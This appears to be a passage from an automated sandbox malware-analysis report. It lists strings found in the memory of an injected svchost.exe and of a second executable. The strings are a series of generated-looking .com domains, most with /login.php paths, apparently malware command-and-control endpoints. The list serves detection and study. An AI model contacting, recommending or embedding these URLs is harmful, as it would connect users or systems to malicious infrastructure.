Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygon.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjox.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjyr.com/login.php
Source: svchost.exe, 00000002.00000003.1743887773.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2611842069.000000000323D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661488887.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyn.com/login.php
Source: svchost.exe, 00000002.00000003.1644432968.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymej.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymir.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvynid.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665001861.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysaj.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytuj.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1739913087.000000000CCDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywed.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxor.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxor.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfuj.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygax.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygud.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxylux.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymin.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynej.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynir.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661488887.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynyx.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/
